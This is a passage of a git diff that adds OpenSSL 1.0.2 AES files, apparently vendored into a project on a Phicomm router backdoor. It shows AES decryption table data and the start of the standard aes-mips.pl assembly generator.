+	data4	0xf68d13c2,0xf68d13c2, 0x90d8b8e8,0x90d8b8e8
+	data4	0x2e39f75e,0x2e39f75e, 0x82c3aff5,0x82c3aff5
+	data4	0x9f5d80be,0x9f5d80be, 0x69d0937c,0x69d0937c
+	data4	0x6fd52da9,0x6fd52da9, 0xcf2512b3,0xcf2512b3
+	data4	0xc8ac993b,0xc8ac993b, 0x10187da7,0x10187da7
+	data4	0xe89c636e,0xe89c636e, 0xdb3bbb7b,0xdb3bbb7b
+	data4	0xcd267809,0xcd267809, 0x6e5918f4,0x6e5918f4
+	data4	0xec9ab701,0xec9ab701, 0x834f9aa8,0x834f9aa8
+	data4	0xe6956e65,0xe6956e65, 0xaaffe67e,0xaaffe67e
+	data4	0x21bccf08,0x21bccf08, 0xef15e8e6,0xef15e8e6
+	data4	0xbae79bd9,0xbae79bd9, 0x4a6f36ce,0x4a6f36ce
+	data4	0xea9f09d4,0xea9f09d4, 0x29b07cd6,0x29b07cd6
+	data4	0x31a4b2af,0x31a4b2af, 0x2a3f2331,0x2a3f2331
+	data4	0xc6a59430,0xc6a59430, 0x35a266c0,0x35a266c0
+	data4	0x744ebc37,0x744ebc37, 0xfc82caa6,0xfc82caa6
+	data4	0xe090d0b0,0xe090d0b0, 0x33a7d815,0x33a7d815
+	data4	0xf104984a,0xf104984a, 0x41ecdaf7,0x41ecdaf7
+	data4	0x7fcd500e,0x7fcd500e, 0x1791f62f,0x1791f62f
+	data4	0x764dd68d,0x764dd68d, 0x43efb04d,0x43efb04d
+	data4	0xccaa4d54,0xccaa4d54, 0xe49604df,0xe49604df
+	data4	0x9ed1b5e3,0x9ed1b5e3, 0x4c6a881b,0x4c6a881b
+	data4	0xc12c1fb8,0xc12c1fb8, 0x4665517f,0x4665517f
+	data4	0x9d5eea04,0x9d5eea04, 0x018c355d,0x018c355d
+	data4	0xfa877473,0xfa877473, 0xfb0b412e,0xfb0b412e
+	data4	0xb3671d5a,0xb3671d5a, 0x92dbd252,0x92dbd252
+	data4	0xe9105633,0xe9105633, 0x6dd64713,0x6dd64713
+	data4	0x9ad7618c,0x9ad7618c, 0x37a10c7a,0x37a10c7a
+	data4	0x59f8148e,0x59f8148e, 0xeb133c89,0xeb133c89
+	data4	0xcea927ee,0xcea927ee, 0xb761c935,0xb761c935
+	data4	0xe11ce5ed,0xe11ce5ed, 0x7a47b13c,0x7a47b13c
+	data4	0x9cd2df59,0x9cd2df59, 0x55f2733f,0x55f2733f
+	data4	0x1814ce79,0x1814ce79, 0x73c737bf,0x73c737bf
+	data4	0x53f7cdea,0x53f7cdea, 0x5ffdaa5b,0x5ffdaa5b
+	data4	0xdf3d6f14,0xdf3d6f14, 0x7844db86,0x7844db86
+	data4	0xcaaff381,0xcaaff381, 0xb968c43e,0xb968c43e
+	data4	0x3824342c,0x3824342c, 0xc2a3405f,0xc2a3405f
+	data4	0x161dc372,0x161dc372, 0xbce2250c,0xbce2250c
+	data4	0x283c498b,0x283c498b, 0xff0d9541,0xff0d9541
+	data4	0x39a80171,0x39a80171, 0x080cb3de,0x080cb3de
+	data4	0xd8b4e49c,0xd8b4e49c, 0x6456c190,0x6456c190
+	data4	0x7bcb8461,0x7bcb8461, 0xd532b670,0xd532b670
+	data4	0x486c5c74,0x486c5c74, 0xd0b85742,0xd0b85742
+// Td4:
+	data1	0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
+	data1	0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
+	data1	0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
+	data1	0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
+	data1	0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
+	data1	0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
+	data1	0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
+	data1	0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
+	data1	0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
+	data1	0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
+	data1	0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
+	data1	0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
+	data1	0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
+	data1	0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
+	data1	0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
+	data1	0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
+	data1	0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
+	data1	0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
+	data1	0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
+	data1	0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
+	data1	0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
+	data1	0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
+	data1	0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
+	data1	0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
+	data1	0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
+	data1	0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
+	data1	0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
+	data1	0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
+	data1	0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
+	data1	0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
+	data1	0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
+	data1	0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
+.size	AES_Td#,2048+256	// HP-UX assembler fails to ".-AES_Td#"
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-mips.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-mips.pl
new file mode 100644
index 0000000..4de3ee2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-mips.pl
@@ -0,0 +1,2122 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# AES for MIPS
+
+# October 2010
+#
+# Code uses 1K[+256B] S-box and on single-issue core [such as R5000]
+# spends ~68 cycles per byte processed with 128-bit key. This is ~16%
+# faster than gcc-generated code, which is not very impressive. But
+# recall that compressed S-box requires extra processing, namely
+# additional rotations. Rotations are implemented with lwl/lwr pairs,
+# which is normally used for loading unaligned data. Another cool
+# thing about this module is its endian neutrality, which means that
+# it processes data without ever changing byte order...
+
+# September 2012
+#
+# Add MIPS32R2 (~10% less instructions) and SmartMIPS ASE (further
+# ~25% less instructions) code. Note that there is no run-time switch,
+# instead, code path is chosen upon pre-process time, pass -mips32r2
+# or/and -msmartmips.
+
+######################################################################
+# There is a number of MIPS ABI in use, O32 and N32/64 are most
+# widely used. Then there is a new contender: NUBI. It appears that if
+# one picks the latter, it's possible to arrange code in ABI neutral
+# manner. Therefore let's stick to NUBI register layout:
+#
+($zero,$at,$t0,$t1,$t2)=map("\$$_",(0..2,24,25));
+($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7,$s8,$s9,$s10,$s11)=map("\$$_",(12..23));
+($gp,$tp,$sp,$fp,$ra)=map("\$$_",(3,28..31));
+#
+# The return value is placed in $a0. Following coding rules facilitate
+# interoperability:
+#
+# - never ever touch $tp, "thread pointer", former $gp;
+# - copy return value to $t0, former $v0 [or to $a0 if you're adapting
+#   old code];
+# - on O32 populate $a4-$a7 with 'lw $aN,4*N($sp)' if necessary;
+#
+# For reference here is register layout for N32/64 MIPS ABIs:
+#
+# ($zero,$at,$v0,$v1)=map("\$$_",(0..3));
+# ($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+# ($t0,$t1,$t2,$t3,$t8,$t9)=map("\$$_",(12..15,24,25));
+# ($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7)=map("\$$_",(16..23));
+# ($gp,$sp,$fp,$ra)=map("\$$_",(28..31));
+#
+$flavour = shift || "o32"; # supported flavours are o32,n32,64,nubi32,nubi64
+
+if ($flavour =~ /64|n32/i) {
+	$PTR_ADD="dadd";	# incidentally works even on n32
+	$PTR_SUB="dsub";	# incidentally works even on n32
+	$PTR_INS="dins";
+	$REG_S="sd";
+	$REG_L="ld";
+	$PTR_SLL="dsll";	# incidentally works even on n32
+	$SZREG=8;
+} else {
+	$PTR_ADD="add";
+	$PTR_SUB="sub";
+	$PTR_INS="ins";
+	$REG_S="sw";
+	$REG_L="lw";
+	$PTR_SLL="sll";
+	$SZREG=4;
+}
+$pf = ($flavour =~ /nubi/i) ? $t0 : $t2;
+#
+# <appro@openssl.org>
+#
+######################################################################
+
+$big_endian=(`echo MIPSEL | $ENV{CC} -E -`=~/MIPSEL/)?1:0 if ($ENV{CC});
+
+for (@ARGV) {	$output=$_ if (/^\w[\w\-]*\.\w+$/);	}
+open STDOUT,">$output";
+
+if (!defined($big_endian))
+{    $big_endian=(unpack('L',pack('N',1))==1);   }
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+my ($MSB,$LSB)=(0,3);	# automatically converted to little-endian
+
+$code.=<<___;
+.text
+#ifdef OPENSSL_FIPSCANISTER
+# include <openssl/fipssyms.h>
+#endif
+
+#if defined(__mips_smartmips) && !defined(_MIPS_ARCH_MIPS32R2)
+#define _MIPS_ARCH_MIPS32R2
+#endif
+
+#if !defined(__mips_eabi) && (!defined(__vxworks) || defined(__pic__))
+.option	pic2
+#endif
+.set	noat
+___
+
+{{{
+my $FRAMESIZE=16*$SZREG;
+my $SAVED_REGS_MASK = ($flavour =~ /nubi/i) ? 0xc0fff008 : 0xc0ff0000;
+
+my ($inp,$out,$key,$Tbl,$s0,$s1,$s2,$s3)=($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7);
+my ($i0,$i1,$i2,$i3)=($at,$t0,$t1,$t2);
+my ($t0,$t1,$t2,$t3,$t4,$t5,$t6,$t7,$t8,$t9,$t10,$t11) = map("\$$_",(12..23));
+my ($key0,$cnt)=($gp,$fp);
+
+# instuction ordering is "stolen" from output from MIPSpro assembler
+# invoked with -mips3 -O3 arguments...
+$code.=<<___;
+.align	5
+.ent	_mips_AES_encrypt
+_mips_AES_encrypt:
+	.frame	$sp,0,$ra
+	.set	reorder
+	lw	$t0,0($key)
+	lw	$t1,4($key)
+	lw	$t2,8($key)
+	lw	$t3,12($key)
+	lw	$cnt,240($key)
+	$PTR_ADD $key0,$key,16
+
+	xor	$s0,$t0
+	xor	$s1,$t1
+	xor	$s2,$t2
+	xor	$s3,$t3
+
+	sub	$cnt,1
+#if defined(__mips_smartmips)
+	ext	$i0,$s1,16,8
+.Loop_enc:
+	ext	$i1,$s2,16,8
+	ext	$i2,$s3,16,8
+	ext	$i3,$s0,16,8
+	lwxs	$t0,$i0($Tbl)		# Te1[s1>>16]
+	ext	$i0,$s2,8,8
+	lwxs	$t1,$i1($Tbl)		# Te1[s2>>16]
+	ext	$i1,$s3,8,8
+	lwxs	$t2,$i2($Tbl)		# Te1[s3>>16]
+	ext	$i2,$s0,8,8
+	lwxs	$t3,$i3($Tbl)		# Te1[s0>>16]
+	ext	$i3,$s1,8,8
+
+	lwxs	$t4,$i0($Tbl)		# Te2[s2>>8]
+	ext	$i0,$s3,0,8
+	lwxs	$t5,$i1($Tbl)		# Te2[s3>>8]
+	ext	$i1,$s0,0,8
+	lwxs	$t6,$i2($Tbl)		# Te2[s0>>8]
+	ext	$i2,$s1,0,8
+	lwxs	$t7,$i3($Tbl)		# Te2[s1>>8]
+	ext	$i3,$s2,0,8
+
+	lwxs	$t8,$i0($Tbl)		# Te3[s3]
+	ext	$i0,$s0,24,8
+	lwxs	$t9,$i1($Tbl)		# Te3[s0]
+	ext	$i1,$s1,24,8
+	lwxs	$t10,$i2($Tbl)		# Te3[s1]
+	ext	$i2,$s2,24,8
+	lwxs	$t11,$i3($Tbl)		# Te3[s2]
+	ext	$i3,$s3,24,8
+
+	rotr	$t0,$t0,8
+	rotr	$t1,$t1,8
+	rotr	$t2,$t2,8
+	rotr	$t3,$t3,8
+
+	rotr	$t4,$t4,16
+	rotr	$t5,$t5,16
+	rotr	$t6,$t6,16
+	rotr	$t7,$t7,16
+
+	xor	$t0,$t4
+	lwxs	$t4,$i0($Tbl)		# Te0[s0>>24]
+	xor	$t1,$t5
+	lwxs	$t5,$i1($Tbl)		# Te0[s1>>24]
+	xor	$t2,$t6
+	lwxs	$t6,$i2($Tbl)		# Te0[s2>>24]
+	xor	$t3,$t7
+	lwxs	$t7,$i3($Tbl)		# Te0[s3>>24]
+
+	rotr	$t8,$t8,24
+	lw	$s0,0($key0)
+	rotr	$t9,$t9,24
+	lw	$s1,4($key0)
+	rotr	$t10,$t10,24
+	lw	$s2,8($key0)
+	rotr	$t11,$t11,24
+	lw	$s3,12($key0)
+
+	xor	$t0,$t8
+	xor	$t1,$t9
+	xor	$t2,$t10
+	xor	$t3,$t11
+
+	xor	$t0,$t4
+	xor	$t1,$t5
+	xor	$t2,$t6
+	xor	$t3,$t7
+
+	sub	$cnt,1
+	$PTR_ADD $key0,16
+	xor	$s0,$t0
+	xor	$s1,$t1
+	xor	$s2,$t2
+	xor	$s3,$t3
+	.set	noreorder
+	bnez	$cnt,.Loop_enc
+	ext	$i0,$s1,16,8
+
+	_xtr	$i0,$s1,16-2
+#else
+	_xtr	$i0,$s1,16-2
+.Loop_enc:
+	_xtr	$i1,$s2,16-2
+	_xtr	$i2,$s3,16-2
+	_xtr	$i3,$s0,16-2
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	lw	$t0,0($i0)		# Te1[s1>>16]
+	_xtr	$i0,$s2,8-2
+	lw	$t1,0($i1)		# Te1[s2>>16]
+	_xtr	$i1,$s3,8-2
+	lw	$t2,0($i2)		# Te1[s3>>16]
+	_xtr	$i2,$s0,8-2
+	lw	$t3,0($i3)		# Te1[s0>>16]
+	_xtr	$i3,$s1,8-2
+#else
+	lwl	$t0,3($i0)		# Te1[s1>>16]
+	lwl	$t1,3($i1)		# Te1[s2>>16]
+	lwl	$t2,3($i2)		# Te1[s3>>16]
+	lwl	$t3,3($i3)		# Te1[s0>>16]
+	lwr	$t0,2($i0)		# Te1[s1>>16]
+	_xtr	$i0,$s2,8-2
+	lwr	$t1,2($i1)		# Te1[s2>>16]
+	_xtr	$i1,$s3,8-2
+	lwr	$t2,2($i2)		# Te1[s3>>16]
+	_xtr	$i2,$s0,8-2
+	lwr	$t3,2($i3)		# Te1[s0>>16]
+	_xtr	$i3,$s1,8-2
+#endif
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	rotr	$t0,$t0,8
+	rotr	$t1,$t1,8
+	rotr	$t2,$t2,8
+	rotr	$t3,$t3,8
+# if defined(_MIPSEL)
+	lw	$t4,0($i0)		# Te2[s2>>8]
+	_xtr	$i0,$s3,0-2
+	lw	$t5,0($i1)		# Te2[s3>>8]
+	_xtr	$i1,$s0,0-2
+	lw	$t6,0($i2)		# Te2[s0>>8]
+	_xtr	$i2,$s1,0-2
+	lw	$t7,0($i3)		# Te2[s1>>8]
+	_xtr	$i3,$s2,0-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lw	$t8,0($i0)		# Te3[s3]
+	$PTR_INS $i0,$s0,2,8
+	lw	$t9,0($i1)		# Te3[s0]
+	$PTR_INS $i1,$s1,2,8
+	lw	$t10,0($i2)		# Te3[s1]
+	$PTR_INS $i2,$s2,2,8
+	lw	$t11,0($i3)		# Te3[s2]
+	$PTR_INS $i3,$s3,2,8
+# else
+	lw	$t4,0($i0)		# Te2[s2>>8]
+	$PTR_INS $i0,$s3,2,8
+	lw	$t5,0($i1)		# Te2[s3>>8]
+	$PTR_INS $i1,$s0,2,8
+	lw	$t6,0($i2)		# Te2[s0>>8]
+	$PTR_INS $i2,$s1,2,8
+	lw	$t7,0($i3)		# Te2[s1>>8]
+	$PTR_INS $i3,$s2,2,8
+
+	lw	$t8,0($i0)		# Te3[s3]
+	_xtr	$i0,$s0,24-2
+	lw	$t9,0($i1)		# Te3[s0]
+	_xtr	$i1,$s1,24-2
+	lw	$t10,0($i2)		# Te3[s1]
+	_xtr	$i2,$s2,24-2
+	lw	$t11,0($i3)		# Te3[s2]
+	_xtr	$i3,$s3,24-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+# endif
+	rotr	$t4,$t4,16
+	rotr	$t5,$t5,16
+	rotr	$t6,$t6,16
+	rotr	$t7,$t7,16
+
+	rotr	$t8,$t8,24
+	rotr	$t9,$t9,24
+	rotr	$t10,$t10,24
+	rotr	$t11,$t11,24
+#else
+	lwl	$t4,2($i0)		# Te2[s2>>8]
+	lwl	$t5,2($i1)		# Te2[s3>>8]
+	lwl	$t6,2($i2)		# Te2[s0>>8]
+	lwl	$t7,2($i3)		# Te2[s1>>8]
+	lwr	$t4,1($i0)		# Te2[s2>>8]
+	_xtr	$i0,$s3,0-2
+	lwr	$t5,1($i1)		# Te2[s3>>8]
+	_xtr	$i1,$s0,0-2
+	lwr	$t6,1($i2)		# Te2[s0>>8]
+	_xtr	$i2,$s1,0-2
+	lwr	$t7,1($i3)		# Te2[s1>>8]
+	_xtr	$i3,$s2,0-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lwl	$t8,1($i0)		# Te3[s3]
+	lwl	$t9,1($i1)		# Te3[s0]
+	lwl	$t10,1($i2)		# Te3[s1]
+	lwl	$t11,1($i3)		# Te3[s2]
+	lwr	$t8,0($i0)		# Te3[s3]
+	_xtr	$i0,$s0,24-2
+	lwr	$t9,0($i1)		# Te3[s0]
+	_xtr	$i1,$s1,24-2
+	lwr	$t10,0($i2)		# Te3[s1]
+	_xtr	$i2,$s2,24-2
+	lwr	$t11,0($i3)		# Te3[s2]
+	_xtr	$i3,$s3,24-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#endif
+	xor	$t0,$t4
+	lw	$t4,0($i0)		# Te0[s0>>24]
+	xor	$t1,$t5
+	lw	$t5,0($i1)		# Te0[s1>>24]
+	xor	$t2,$t6
+	lw	$t6,0($i2)		# Te0[s2>>24]
+	xor	$t3,$t7
+	lw	$t7,0($i3)		# Te0[s3>>24]
+
+	xor	$t0,$t8
+	lw	$s0,0($key0)
+	xor	$t1,$t9
+	lw	$s1,4($key0)
+	xor	$t2,$t10
+	lw	$s2,8($key0)
+	xor	$t3,$t11
+	lw	$s3,12($key0)
+
+	xor	$t0,$t4
+	xor	$t1,$t5
+	xor	$t2,$t6
+	xor	$t3,$t7
+
+	sub	$cnt,1
+	$PTR_ADD $key0,16
+	xor	$s0,$t0
+	xor	$s1,$t1
+	xor	$s2,$t2
+	xor	$s3,$t3
+	.set	noreorder
+	bnez	$cnt,.Loop_enc
+	_xtr	$i0,$s1,16-2
+#endif
+
+	.set	reorder
+	_xtr	$i1,$s2,16-2
+	_xtr	$i2,$s3,16-2
+	_xtr	$i3,$s0,16-2
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$t0,2($i0)		# Te4[s1>>16]
+	_xtr	$i0,$s2,8-2
+	lbu	$t1,2($i1)		# Te4[s2>>16]
+	_xtr	$i1,$s3,8-2
+	lbu	$t2,2($i2)		# Te4[s3>>16]
+	_xtr	$i2,$s0,8-2
+	lbu	$t3,2($i3)		# Te4[s0>>16]
+	_xtr	$i3,$s1,8-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+# if defined(_MIPSEL)
+	lbu	$t4,2($i0)		# Te4[s2>>8]
+	$PTR_INS $i0,$s0,2,8
+	lbu	$t5,2($i1)		# Te4[s3>>8]
+	$PTR_INS $i1,$s1,2,8
+	lbu	$t6,2($i2)		# Te4[s0>>8]
+	$PTR_INS $i2,$s2,2,8
+	lbu	$t7,2($i3)		# Te4[s1>>8]
+	$PTR_INS $i3,$s3,2,8
+
+	lbu	$t8,2($i0)		# Te4[s0>>24]
+	_xtr	$i0,$s3,0-2
+	lbu	$t9,2($i1)		# Te4[s1>>24]
+	_xtr	$i1,$s0,0-2
+	lbu	$t10,2($i2)		# Te4[s2>>24]
+	_xtr	$i2,$s1,0-2
+	lbu	$t11,2($i3)		# Te4[s3>>24]
+	_xtr	$i3,$s2,0-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+# else
+	lbu	$t4,2($i0)		# Te4[s2>>8]
+	_xtr	$i0,$s0,24-2
+	lbu	$t5,2($i1)		# Te4[s3>>8]
+	_xtr	$i1,$s1,24-2
+	lbu	$t6,2($i2)		# Te4[s0>>8]
+	_xtr	$i2,$s2,24-2
+	lbu	$t7,2($i3)		# Te4[s1>>8]
+	_xtr	$i3,$s3,24-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$t8,2($i0)		# Te4[s0>>24]
+	$PTR_INS $i0,$s3,2,8
+	lbu	$t9,2($i1)		# Te4[s1>>24]
+	$PTR_INS $i1,$s0,2,8
+	lbu	$t10,2($i2)		# Te4[s2>>24]
+	$PTR_INS $i2,$s1,2,8
+	lbu	$t11,2($i3)		# Te4[s3>>24]
+	$PTR_INS $i3,$s2,2,8
+# endif
+	_ins	$t0,16
+	_ins	$t1,16
+	_ins	$t2,16
+	_ins	$t3,16
+
+	_ins2	$t0,$t4,8
+	lbu	$t4,2($i0)		# Te4[s3]
+	_ins2	$t1,$t5,8
+	lbu	$t5,2($i1)		# Te4[s0]
+	_ins2	$t2,$t6,8
+	lbu	$t6,2($i2)		# Te4[s1]
+	_ins2	$t3,$t7,8
+	lbu	$t7,2($i3)		# Te4[s2]
+
+	_ins2	$t0,$t8,24
+	lw	$s0,0($key0)
+	_ins2	$t1,$t9,24
+	lw	$s1,4($key0)
+	_ins2	$t2,$t10,24
+	lw	$s2,8($key0)
+	_ins2	$t3,$t11,24
+	lw	$s3,12($key0)
+
+	_ins2	$t0,$t4,0
+	_ins2	$t1,$t5,0
+	_ins2	$t2,$t6,0
+	_ins2	$t3,$t7,0
+#else
+	lbu	$t4,2($i0)		# Te4[s2>>8]
+	_xtr	$i0,$s0,24-2
+	lbu	$t5,2($i1)		# Te4[s3>>8]
+	_xtr	$i1,$s1,24-2
+	lbu	$t6,2($i2)		# Te4[s0>>8]
+	_xtr	$i2,$s2,24-2
+	lbu	$t7,2($i3)		# Te4[s1>>8]
+	_xtr	$i3,$s3,24-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$t8,2($i0)		# Te4[s0>>24]
+	_xtr	$i0,$s3,0-2
+	lbu	$t9,2($i1)		# Te4[s1>>24]
+	_xtr	$i1,$s0,0-2
+	lbu	$t10,2($i2)		# Te4[s2>>24]
+	_xtr	$i2,$s1,0-2
+	lbu	$t11,2($i3)		# Te4[s3>>24]
+	_xtr	$i3,$s2,0-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+
+	_ins	$t0,16
+	_ins	$t1,16
+	_ins	$t2,16
+	_ins	$t3,16
+
+	_ins	$t4,8
+	_ins	$t5,8
+	_ins	$t6,8
+	_ins	$t7,8
+
+	xor	$t0,$t4
+	lbu	$t4,2($i0)		# Te4[s3]
+	xor	$t1,$t5
+	lbu	$t5,2($i1)		# Te4[s0]
+	xor	$t2,$t6
+	lbu	$t6,2($i2)		# Te4[s1]
+	xor	$t3,$t7
+	lbu	$t7,2($i3)		# Te4[s2]
+
+	_ins	$t8,24
+	lw	$s0,0($key0)
+	_ins	$t9,24
+	lw	$s1,4($key0)
+	_ins	$t10,24
+	lw	$s2,8($key0)
+	_ins	$t11,24
+	lw	$s3,12($key0)
+
+	xor	$t0,$t8
+	xor	$t1,$t9
+	xor	$t2,$t10
+	xor	$t3,$t11
+
+	_ins	$t4,0
+	_ins	$t5,0
+	_ins	$t6,0
+	_ins	$t7,0
+
+	xor	$t0,$t4
+	xor	$t1,$t5
+	xor	$t2,$t6
+	xor	$t3,$t7
+#endif
+	xor	$s0,$t0
+	xor	$s1,$t1
+	xor	$s2,$t2
+	xor	$s3,$t3
+
+	jr	$ra
+.end	_mips_AES_encrypt
+
+.align	5
+.globl	AES_encrypt
+.ent	AES_encrypt
+AES_encrypt:
+	.frame	$sp,$FRAMESIZE,$ra
+	.mask	$SAVED_REGS_MASK,-$SZREG
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /o32/i);	# o32 PIC-ification
+	.cpload	$pf
+___
+$code.=<<___;
+	$PTR_SUB $sp,$FRAMESIZE
+	$REG_S	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_S	$fp,$FRAMESIZE-2*$SZREG($sp)
+	$REG_S	$s11,$FRAMESIZE-3*$SZREG($sp)
+	$REG_S	$s10,$FRAMESIZE-4*$SZREG($sp)
+	$REG_S	$s9,$FRAMESIZE-5*$SZREG($sp)
+	$REG_S	$s8,$FRAMESIZE-6*$SZREG($sp)
+	$REG_S	$s7,$FRAMESIZE-7*$SZREG($sp)
+	$REG_S	$s6,$FRAMESIZE-8*$SZREG($sp)
+	$REG_S	$s5,$FRAMESIZE-9*$SZREG($sp)
+	$REG_S	$s4,$FRAMESIZE-10*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);	# optimize non-nubi prologue
+	$REG_S	\$15,$FRAMESIZE-11*$SZREG($sp)
+	$REG_S	\$14,$FRAMESIZE-12*$SZREG($sp)
+	$REG_S	\$13,$FRAMESIZE-13*$SZREG($sp)
+	$REG_S	\$12,$FRAMESIZE-14*$SZREG($sp)
+	$REG_S	$gp,$FRAMESIZE-15*$SZREG($sp)
+___
+$code.=<<___ if ($flavour !~ /o32/i);	# non-o32 PIC-ification
